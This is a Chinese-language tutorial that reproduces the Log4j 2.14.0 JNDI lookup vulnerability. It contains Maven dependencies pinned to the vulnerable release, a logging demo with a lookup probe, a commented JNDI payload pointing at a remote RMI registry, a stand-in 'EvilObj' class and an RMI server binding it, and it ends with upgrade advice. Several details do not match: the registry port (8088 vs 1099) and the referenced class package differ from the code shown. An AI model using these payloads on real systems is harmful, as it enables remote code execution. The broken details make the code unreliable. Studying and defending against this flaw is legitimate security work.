依赖版本:必须使用 2.14.0 及之前的版本(下面的示例使用的就是 2.14.0),但是现在(官网、阿里云仓库)下载到的 jar 包都是已经被官方修复过的了。
<!-- Reproduction only: both artifacts are pinned to 2.14.0, the release this page tests against.
     The remediation at the end of the page is to raise these versions; keep log4j-api and
     log4j-core on the same version when doing so. -->
<dependencies>
<!-- Logging facade used by application code (LogManager / Logger). -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.0</version>
</dependency>
<!-- Logging implementation; this is the artifact whose version decides whether lookups in
     logged data are resolved, so it is the one to check in the resolved dependency tree. -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.0</version>
</dependency>
</dependencies>
package com.example.log4jdemo;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
/**
 * Minimal reproduction target: logs one string through log4j so the reader can see
 * whether the configured log4j-core version resolves {@code ${...}} lookups that arrive
 * as message parameters.
 *
 * <p>The value is hard-coded here; in a real application the same position is typically
 * filled by request data (user name, header, and so on), which is why lookup resolution
 * in logged parameters matters to defenders.
 */
public class Log4jdemoApplication {

    /** Logger named after the calling class (no-argument {@code getLogger()}). */
    private static final Logger LOGGER = LogManager.getLogger();

    /**
     * Logs a greeting whose parameter is a lookup expression.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // Probe value: if the output shows operating-system details instead of the
        // literal text, the logging library is evaluating lookups inside parameters.
        final String userName = "${java:os}";

        // Alternative input from the original write-up, left disabled: a JNDI lookup
        // that makes the logging library contact a remote RMI registry.
        // String userName = "${jndi:rmi://192.168.65.31:1099/evil}";

        LOGGER.info("Hello, {}!", userName);
    }
}
package com.example.log4jdemo.com.zengwx.log4jdemo;
/**
 * Stand-in payload class for the reproduction.
 *
 * <p>It has no methods or fields; its only behaviour is a static initializer that prints
 * a marker line. Static initializers run when the JVM initializes the class, so the
 * marker appearing on the console shows that the class was loaded and initialized.
 */
public class EvilObj {

    static {
        // Marker text is emitted exactly once, at class initialization.
        final String marker = "执行了~~~";
        System.out.println(marker);
    }
}
package com.example.log4jdemo.com.zengwx.log4jdemo;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
/**
 * Lab-side RMI registry used by this page's reproduction.
 *
 * <p>It creates a registry, obtains a registry stub, wraps a {@link Reference} in the
 * JDK-internal {@code ReferenceWrapper} and binds it under the name {@code "evil"}.
 *
 * <p>Defender's view: an application that resolves a {@code ${jndi:rmi://...}} lookup
 * opens an outbound connection to a registry like this one. Unexpected outbound RMI or
 * LDAP traffic from application hosts is therefore a useful detection signal, and
 * egress filtering together with upgrading log4j-core removes the path.
 */
public class RMIServer {

    /**
     * Starts the registry and binds the reference; any failure is printed and the
     * method returns.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(8088);
            Registry rmiRegistry = LocateRegistry.getRegistry();
            System.out.println("create RMI registry on port 8088");

            // Class name and factory name are the same string; the factory location
            // argument is left empty.
            Reference payloadReference =
                    new Reference("com.zhouyu.rmi.EvilObj", "com.zhouyu.rmi.EvilObj", "");
            ReferenceWrapper boundObject = new ReferenceWrapper(payloadReference);

            rmiRegistry.bind("evil", boundObject);
        } catch (Exception failure) {
            failure.printStackTrace();
        }
    }
}
解决方案
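将 log4j 的 Maven 依赖(log4j-api 和 log4j-core)版本修改为 2.15 版本就可以!!!需要注意的是,2.15 之后官方又陆续发布了后续修复版本,实际升级时应直接使用官方当前推荐的最新版本,并用 `mvn dependency:tree` 确认传递依赖中没有残留旧版本的 log4j-core。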